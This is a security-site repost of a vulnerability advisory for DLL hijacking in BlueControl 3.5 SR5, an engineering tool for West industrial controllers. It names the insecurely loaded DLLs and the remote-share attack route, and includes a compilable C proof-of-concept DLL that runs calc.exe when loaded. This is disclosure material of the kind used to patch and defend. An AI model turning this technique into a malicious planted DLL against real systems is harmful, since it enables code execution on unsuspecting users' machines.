首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2016-01-20  
/*


BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution


Vendor: West Control Solutions
        PMA Proze�- und Maschinen-Automation GmbH
Product web page: http://www.west-cs.com
Software link: http://www.west-cs.com/resources/software-temp-control/pma-products-software/
Application Path: C:\Program Files (x86)\PMA Tools\BlueControl\BlueControl.exe
Affected version: 3.5.SR5

Summary: Engineering Tool for West Pro Series of controllers (KS20-1, KS92-1,
TB40-1, KS800, KS816, Dig280-1, KS vario, CI45, KS45, SG45, TB45, RL400, Pro96,
CAL4600).

Desc: BlueControl suffers from a DLL Hijacking issue. The vulnerability is
caused due to the application loading libraries (sortserver2003compat.dll,
sxs.dll, cryptsp.dll, rpcrtremote.dll) in an insecure manner. This can be
exploited to load arbitrary libraries by tricking a user into opening a
related application files (.BCD, .BCL, .BCT, .EDW, .E80) located on a remote
WebDAV or SMB share.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5296
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5296.php


10.12.2015

*/


// gcc -shared -o rpcrtremote.dll exploit.c

#include <windows.h> 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
	exec();
	return 0;
}

int exec()
{
	WinExec("calc.exe" , SW_NORMAL);
	return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Art Systems FluidDraw P5/S5 5.
·Java Platform SE 6 U24 HtmlCon
·Linux Kernel REFCOUNT Overflow
·xWPE 1.5.30a-2.1 - Local Buffe
·NetSchedScan 1.0 - Crash PoC
·Amanda <= 3.3.1 - amstar Comma
·Android ADB Debug Server Remot
·SevOne NMS <= 5.3.6.0 - Remote
·FreeBSD SCTP ICMPv6 Error Proc
·WhatsUp Gold 16.3 - Unauthenti
·Buffalo NAS Remote Shutdown
·Konica Minolta FTP Utility 1.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved